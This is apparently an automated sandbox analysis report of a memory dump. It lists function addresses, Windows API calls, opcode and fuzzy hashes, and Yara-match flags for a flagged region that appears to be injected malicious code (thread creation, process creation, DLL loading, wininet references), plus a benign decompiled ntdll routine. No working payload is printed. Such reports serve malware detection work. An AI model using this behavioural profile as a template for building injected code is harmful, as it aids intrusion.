                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 6ce7e07316a6a9ba94e582784b51a3ef6ceb41c6713798f66c0ac44c8cc779e7
                                            • Instruction ID: 60d85c9b187e2ba577472cf468c5dc8df35fe0c1a050a417be2275b4d6a09059
                                            • Opcode Fuzzy Hash: 6ce7e07316a6a9ba94e582784b51a3ef6ceb41c6713798f66c0ac44c8cc779e7
                                            • Instruction Fuzzy Hash: 389002B1A0200802F58071598404A4E000597E1345F91C01AE0016658DCB59DA5977E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 044796D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.924395583.0000000004410000.00000040.00000001.sdmp, Offset: 04410000, based on PE: true
                                            • Associated: 00000006.00000002.924525932.000000000452B000.00000040.00000001.sdmp Download File
                                            • Associated: 00000006.00000002.924534412.000000000452F000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: ff87f9a20b94199c0068ffe4e724bf2f90bf3c3502252219e8f797949317e384
                                            • Instruction ID: ceab0b7114527c180aa9941c8aa1d651ca48c6b4b4cf47fe8f2d1aeb5bce9b29
                                            • Opcode Fuzzy Hash: ff87f9a20b94199c0068ffe4e724bf2f90bf3c3502252219e8f797949317e384
                                            • Instruction Fuzzy Hash: 259002B1A0200842F50071598404F4A000597F0345F51C01BE0115658D8759D8517561
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 044796E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.924395583.0000000004410000.00000040.00000001.sdmp, Offset: 04410000, based on PE: true
                                            • Associated: 00000006.00000002.924525932.000000000452B000.00000040.00000001.sdmp Download File
                                            • Associated: 00000006.00000002.924534412.000000000452F000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 512a4ebec7f6492c159260370c50ed46f7e65e298822427f5d9c71c365a57cd1
                                            • Instruction ID: 16e70616a41e19cdcfe40cceadafe7261ad661d366066f726d6bbaf74c245d62
                                            • Opcode Fuzzy Hash: 512a4ebec7f6492c159260370c50ed46f7e65e298822427f5d9c71c365a57cd1
                                            • Instruction Fuzzy Hash: 8C9002B1A0208802F5107159C404B4E000597E0345F55C416E441565CD87D9D8917161
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 04479710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.924395583.0000000004410000.00000040.00000001.sdmp, Offset: 04410000, based on PE: true
                                            • Associated: 00000006.00000002.924525932.000000000452B000.00000040.00000001.sdmp Download File
                                            • Associated: 00000006.00000002.924534412.000000000452F000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 8aa5c1d4ff7883a6cb09e4324dde3c9ce9629f1f2a25ac75b34fd4a7352be4d4
                                            • Instruction ID: 14f3254150f1a38f278bad61f68470947f4bc3922214a73087232847030cf316
                                            • Opcode Fuzzy Hash: 8aa5c1d4ff7883a6cb09e4324dde3c9ce9629f1f2a25ac75b34fd4a7352be4d4
                                            • Instruction Fuzzy Hash: B19002B1A0200402F50075999408A4A000597F0345F51D016E5015559EC7A9D8917171
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 04479FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.924395583.0000000004410000.00000040.00000001.sdmp, Offset: 04410000, based on PE: true
                                            • Associated: 00000006.00000002.924525932.000000000452B000.00000040.00000001.sdmp Download File
                                            • Associated: 00000006.00000002.924534412.000000000452F000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: cc44a730aa11e294f56838f708e58b1d300cc40b5485d1e4fe915c5cb5c86679
                                            • Instruction ID: 046875a2af4da5f745986d3ff80a18d682ffdf5539a2856ffff6eb026109585e
                                            • Opcode Fuzzy Hash: cc44a730aa11e294f56838f708e58b1d300cc40b5485d1e4fe915c5cb5c86679
                                            • Instruction Fuzzy Hash: 429002B1B1214402F5107159C404B0A000597E1245F51C416E081555CD87D9D8917162
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 04479780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.924395583.0000000004410000.00000040.00000001.sdmp, Offset: 04410000, based on PE: true
                                            • Associated: 00000006.00000002.924525932.000000000452B000.00000040.00000001.sdmp Download File
                                            • Associated: 00000006.00000002.924534412.000000000452F000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 9daad6b14079918f226888b53081c65415f4b81c5058e322a488dfc56720403d
                                            • Instruction ID: c923951a4b07bcf7c8b5831fc7f34386d223c660122f4c1564ee1d2b77944186
                                            • Opcode Fuzzy Hash: 9daad6b14079918f226888b53081c65415f4b81c5058e322a488dfc56720403d
                                            • Instruction Fuzzy Hash: 5C9002A9A1300002F58071599408A0E000597E1246F91D41AE000655CCCA59D8696361
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 04479840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.924395583.0000000004410000.00000040.00000001.sdmp, Offset: 04410000, based on PE: true
                                            • Associated: 00000006.00000002.924525932.000000000452B000.00000040.00000001.sdmp Download File
                                            • Associated: 00000006.00000002.924534412.000000000452F000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 6d830cbb0129d229754d522741136ed810907d07fa174ef7f516acf10df55434
                                            • Instruction ID: 6a8bc3fa82da60a46a530cd8c61adac4d2e5fffee8925ef34a687d7ece8f0d05
                                            • Opcode Fuzzy Hash: 6d830cbb0129d229754d522741136ed810907d07fa174ef7f516acf10df55434
                                            • Instruction Fuzzy Hash: FC9002A1A43041527945B159840490B4006A7F0285791C017E1405954C866AE856E661
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 04479860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.924395583.0000000004410000.00000040.00000001.sdmp, Offset: 04410000, based on PE: true
                                            • Associated: 00000006.00000002.924525932.000000000452B000.00000040.00000001.sdmp Download File
                                            • Associated: 00000006.00000002.924534412.000000000452F000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 329a2e4e8091975a2e41d043eab9f6e16a0759fa3435fe52d3c45a54b1586056
                                            • Instruction ID: 62435d70b98f836dcf80fd804676ff570e555444756513dab108fe2608a17c5a
                                            • Opcode Fuzzy Hash: 329a2e4e8091975a2e41d043eab9f6e16a0759fa3435fe52d3c45a54b1586056
                                            • Instruction Fuzzy Hash: 879002B1A0200413F51171598504B0B000997E0285F91C417E041555CD979AD952B161
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 04479910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.924395583.0000000004410000.00000040.00000001.sdmp, Offset: 04410000, based on PE: true
                                            • Associated: 00000006.00000002.924525932.000000000452B000.00000040.00000001.sdmp Download File
                                            • Associated: 00000006.00000002.924534412.000000000452F000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 2d9b9a5ad96abd35a4f61c010e5ea5e339c984a84fb2d89e15bee94e6eabef91
                                            • Instruction ID: d2e8219d2408e192d895e8cc01c7d3351ec02bd1baeb8e6496091aeeb68956f8
                                            • Opcode Fuzzy Hash: 2d9b9a5ad96abd35a4f61c010e5ea5e339c984a84fb2d89e15bee94e6eabef91
                                            • Instruction Fuzzy Hash: 4A9002F1A0200402F54071598404B4A000597E0345F51C016E5055558E879DDDD576A5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 044799A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.924395583.0000000004410000.00000040.00000001.sdmp, Offset: 04410000, based on PE: true
                                            • Associated: 00000006.00000002.924525932.000000000452B000.00000040.00000001.sdmp Download File
                                            • Associated: 00000006.00000002.924534412.000000000452F000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: f918b086e1515fa149a44fc33620377cb6465d567301789a55a8c604f7c22f3f
                                            • Instruction ID: 622d48a62d56f842993ab99418b6872dcddc8964fbe7a150500696cb289de61a
                                            • Opcode Fuzzy Hash: f918b086e1515fa149a44fc33620377cb6465d567301789a55a8c604f7c22f3f
                                            • Instruction Fuzzy Hash: 2D9002E1B4200442F50071598414F0A0005D7F1345F51C01AE1055558D875DDC527166
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 04479A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.924395583.0000000004410000.00000040.00000001.sdmp, Offset: 04410000, based on PE: true
                                            • Associated: 00000006.00000002.924525932.000000000452B000.00000040.00000001.sdmp Download File
                                            • Associated: 00000006.00000002.924534412.000000000452F000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 9fb0d492986844e645ea542bcd07c3a9b66f4340bbd6d730eb262893ea10f301
                                            • Instruction ID: 6171155117bfeba4d637a41c5cdc5bb2c99b1c86dad1654c02d14e5b99da8418
                                            • Opcode Fuzzy Hash: 9fb0d492986844e645ea542bcd07c3a9b66f4340bbd6d730eb262893ea10f301
                                            • Instruction Fuzzy Hash: E69002A1A1280042F60075698C14F0B000597E0347F51C11AE0145558CCA59D8616561
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02398C40, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                            Download Yara Rule
                                            APIs
                                            • Sleep.KERNELBASE(000007D0), ref: 02398CE8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.923792314.0000000002380000.00000040.00000001.sdmp, Offset: 02380000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: Sleep
                                            • String ID: net.dll$wininet.dll
                                            • API String ID: 3472027048-1269752229
                                            • Opcode ID: 64c1da11a2fbbb66597a7421ac5ce455c702652de1a51f0790dd60c03a6a93a1
                                            • Instruction ID: 2090ea53b59408f1c30a0552b8358e56282889678e32896b44939b9dc035fff9
                                            • Opcode Fuzzy Hash: 64c1da11a2fbbb66597a7421ac5ce455c702652de1a51f0790dd60c03a6a93a1
                                            • Instruction Fuzzy Hash: 0A3190B2500748BBCB24DF69D884FA7F7B9BF89700F00841EE6299B241D730A550CFA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02398C36, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81sleepCOMMON
                                            Download Yara Rule
                                            APIs
                                            • Sleep.KERNELBASE(000007D0), ref: 02398CE8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.923792314.0000000002380000.00000040.00000001.sdmp, Offset: 02380000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: Sleep
                                            • String ID: net.dll$wininet.dll
                                            • API String ID: 3472027048-1269752229
                                            • Opcode ID: e1be860e772bf169140e55a84ba0373508c17612ae976b7a65d4f21641bd2911
                                            • Instruction ID: b88759d30c8d6f47394839528508a41bfe9b155f48af5b718b30f94773718ef8
                                            • Opcode Fuzzy Hash: e1be860e772bf169140e55a84ba0373508c17612ae976b7a65d4f21641bd2911
                                            • Instruction Fuzzy Hash: C821A2B1540748BBCB20DF69D885BABF7B9BF89704F00841EE629AB241D774A950CF94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0239A222, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02383AF8), ref: 0239A25D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.923792314.0000000002380000.00000040.00000001.sdmp, Offset: 02380000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID: .z`
                                            • API String ID: 3298025750-1441809116
                                            • Opcode ID: e9b2c240351ead50196704d48bc9040c11e301336f8b8fc5d8b799fe13bbd359
                                            • Instruction ID: d7f2aaab4867db830a56d4c82d2145940a406f585c048d46813ff57e2efc5240
                                            • Opcode Fuzzy Hash: e9b2c240351ead50196704d48bc9040c11e301336f8b8fc5d8b799fe13bbd359
                                            • Instruction Fuzzy Hash: C5E065B12002146BCB24DF99CC98EA73BADEF88254F004259F9099B341C235EA14CBE0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0239A230, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02383AF8), ref: 0239A25D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.923792314.0000000002380000.00000040.00000001.sdmp, Offset: 02380000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID: .z`
                                            • API String ID: 3298025750-1441809116
                                            • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                            • Instruction ID: 8efa0f63117563a0063844529be9706bdfda748c655b8182f67d1b0a4d2c67b6
                                            • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                            • Instruction Fuzzy Hash: 9DE046B1200208ABDB28EF99DC48EA777ADEF88750F018659FE085B241C630F910CBF0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 023882B3, Relevance: 3.1, APIs: 2, Instructions: 78threadwindowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0238834A
                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0238836B
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.923792314.0000000002380000.00000040.00000001.sdmp, Offset: 02380000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: a4c983c0d17bc2be359d522c1c51483c049fb99a4dc47482a8cf6ae9c4e58310
                                            • Instruction ID: 42f8550e2f1af7fd06028e5b74b7dfe52eec404f554ed4dcbc73915dc05ef8e0
                                            • Opcode Fuzzy Hash: a4c983c0d17bc2be359d522c1c51483c049fb99a4dc47482a8cf6ae9c4e58310
                                            • Instruction Fuzzy Hash: EE113876A0435C2AEF31BB746C41FFB735D9B01B14F440597FE08DA182EA91A9154AE1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 023882E8, Relevance: 3.1, APIs: 2, Instructions: 58threadwindowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0238834A
                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0238836B
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.923792314.0000000002380000.00000040.00000001.sdmp, Offset: 02380000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: 613b2b0b9bd8a1dee0149df40b836f4aa45921ea2d4660c5f7fafbeba3ae1ab1
                                            • Instruction ID: 2d7a673c395aa23f6fe5d2fa743c8a0b40fd53af02ac9a7a7cadc5d3f73fdd33
                                            • Opcode Fuzzy Hash: 613b2b0b9bd8a1dee0149df40b836f4aa45921ea2d4660c5f7fafbeba3ae1ab1
                                            • Instruction Fuzzy Hash: BD01D836A802287AEB31B6D49C01FFEA72CAB41F51F140019FB04BF1C1E7946A054BF5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 023882F0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0238834A
                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0238836B
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.923792314.0000000002380000.00000040.00000001.sdmp, Offset: 02380000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: 29a892fc29f7ae1cc7dcf0d9980a4ef5a3648e613fbd5d957af854e8297cf94a
                                            • Instruction ID: 12ac9d06e419cc12a0f244670081c8c409802c99e728222adb45ed8de96d6fef
                                            • Opcode Fuzzy Hash: 29a892fc29f7ae1cc7dcf0d9980a4ef5a3648e613fbd5d957af854e8297cf94a
                                            • Instruction Fuzzy Hash: FC018F31A803287BEB30BA949C02FBEB66D6B41F54F040119FF04BA1C1E694A9064AE5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0238ACC0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0238AD32
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.923792314.0000000002380000.00000040.00000001.sdmp, Offset: 02380000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
                                            • Instruction ID: 5c4bcdd198c3bca4fb764cedb82523247443eb8e0ff2223e3213eb6108abf38b
                                            • Opcode Fuzzy Hash: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
                                            • Instruction Fuzzy Hash: CA0121B5D4020DABDF10EBE4DC41FDEB7B9AB44708F0045A6E9099B240F671EB18CB91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0239A2A0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0239A2F4
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.923792314.0000000002380000.00000040.00000001.sdmp, Offset: 02380000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: CreateInternalProcess
                                            • String ID:
                                            • API String ID: 2186235152-0
                                            • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                            • Instruction ID: 9523353a608318cd1b92ec894c0d64186886eecc2cbbcf1902b77b4b49958d20
                                            • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                            • Instruction Fuzzy Hash: E5015FB2214108ABCB54DF89DC90EEB77AEAF8C754F158258BA0D97251D630E851CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0239A29D, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0239A2F4
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.923792314.0000000002380000.00000040.00000001.sdmp, Offset: 02380000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: CreateInternalProcess
                                            • String ID:
                                            • API String ID: 2186235152-0
                                            • Opcode ID: de92b8e5b8269129c31c460ee8b5136e0e14043a94df815cfd1013d4e4f1515e
                                            • Instruction ID: 28bdadc5f08b9641a08f23ee21adbc9b25a2781d785832d1e3f0a59cf68bb19a
                                            • Opcode Fuzzy Hash: de92b8e5b8269129c31c460ee8b5136e0e14043a94df815cfd1013d4e4f1515e
                                            • Instruction Fuzzy Hash: 3101AFB2214108AFCB54DF89DC80EEB77AAAF8C354F158259BA0DE7250C630E851CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02398D70, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0238F010,?,?,00000000), ref: 02398DAC
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.923792314.0000000002380000.00000040.00000001.sdmp, Offset: 02380000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: CreateThread
                                            • String ID:
                                            • API String ID: 2422867632-0
                                            • Opcode ID: 0492dd52497a697f2125d76e48c7ee170aee05726da811e9b98eccb8e968774a
                                            • Instruction ID: 484a3fae1a59b5a46007c42f23f3923f4040fa4b90b055ee76ebceae3afc58cb
                                            • Opcode Fuzzy Hash: 0492dd52497a697f2125d76e48c7ee170aee05726da811e9b98eccb8e968774a
                                            • Instruction Fuzzy Hash: 14E06D737803043AE730659DAC02FA7B29C8B96B25F550026FA4DEB2C1D595F80146A4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0239A390, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                            Download Yara Rule
                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,0238F192,0238F192,?,00000000,?,?), ref: 0239A3C0
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.923792314.0000000002380000.00000040.00000001.sdmp, Offset: 02380000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                            • Instruction ID: ced600a38a2b6fcd9bf83fc3ce0defefa5a94db3801498a3263a210f3cd7b48c
                                            • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                            • Instruction Fuzzy Hash: 61E01AB12002086BDB20DF49DC84EE737ADAF89650F018155BE0857241C930E8108BF5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0239A1F0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlAllocateHeap.NTDLL(023944F6,?,02394C6F,02394C6F,?,023944F6,?,?,?,?,?,00000000,00000000,?), ref: 0239A21D
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.923792314.0000000002380000.00000040.00000001.sdmp, Offset: 02380000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID:
                                            • API String ID: 1279760036-0
                                            • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                            • Instruction ID: 1e21b0b33cedc1c776cabda16346d3f76e105c5c53b666aaf382f0be1ce9f590
                                            • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                            • Instruction Fuzzy Hash: DBE046B1200208ABDB24EF99DC40EA777ADEF88750F118559FE085B241C630F910CBF0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0238F690, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetErrorMode.KERNELBASE(00008003,?,02388CF4,?), ref: 0238F6BB
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.923792314.0000000002380000.00000040.00000001.sdmp, Offset: 02380000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorMode
                                            • String ID:
                                            • API String ID: 2340568224-0
                                            • Opcode ID: 7ea49bcfd7eb89cfce1dd1d38e7dcc5e35a49d50de701d0c82c68256bf4518e3
                                            • Instruction ID: 05a10e06582c7d9d5afb1d79ddd30e4c3e044b5301b2dbf0dc4712dc35dad182
                                            • Opcode Fuzzy Hash: 7ea49bcfd7eb89cfce1dd1d38e7dcc5e35a49d50de701d0c82c68256bf4518e3
                                            • Instruction Fuzzy Hash: EDD0A7727903043BEA10FAA49C03F2772CD6B45B04F490064FA48DB3C3DA50E4014565
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0447967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.924395583.0000000004410000.00000040.00000001.sdmp, Offset: 04410000, based on PE: true
                                            • Associated: 00000006.00000002.924525932.000000000452B000.00000040.00000001.sdmp Download File
                                            • Associated: 00000006.00000002.924534412.000000000452F000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 548780de4bc8dc64901c03632df03ee8897120f0add118c66814d3824fda36cf
                                            • Instruction ID: fec7fd2a346a23c1b599e8e74a0a6333b4f1e0febbf9002867861cb0a367a297
                                            • Opcode Fuzzy Hash: 548780de4bc8dc64901c03632df03ee8897120f0add118c66814d3824fda36cf
                                            • Instruction Fuzzy Hash: 9FB09BF1D024C5C5FF11E7604608F1B790077E0745F16C157D1020655A477CD091F5B5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Non-executed Functions

                                            Function 044CFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 53%
                                            			E044CFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0447CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E044C5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E044C5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                            0x044cfdda
                                            0x044cfde2
                                            0x044cfde5
                                            0x044cfdec
                                            0x044cfdfa
                                            0x044cfdff
                                            0x044cfe0a
                                            0x044cfe0f
                                            0x044cfe17
                                            0x044cfe1e
                                            0x044cfe19
                                            0x044cfe19
                                            0x044cfe19
                                            0x044cfe20
                                            0x044cfe21
                                            0x044cfe22
                                            0x044cfe25
                                            0x044cfe40

                                            APIs
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 044CFDFA
                                            Strings
                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 044CFE01
                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 044CFE2B
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.924395583.0000000004410000.00000040.00000001.sdmp, Offset: 04410000, based on PE: true
                                            • Associated: 00000006.00000002.924525932.000000000452B000.00000040.00000001.sdmp Download File
                                            • Associated: 00000006.00000002.924534412.000000000452F000.00000040.00000001.sdmp Download File
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                            • API String ID: 885266447-3903918235
                                            • Opcode ID: aaeada1454ac5648527800afa60d9d7d4f95328168fe8a0fc61ca07baa432aa8
                                            • Instruction ID: 3deb99049ac7fa037a601bd80f106faff299cfba1c183cd4667919259bd5548a
                                            • Opcode Fuzzy Hash: aaeada1454ac5648527800afa60d9d7d4f95328168fe8a0fc61ca07baa432aa8
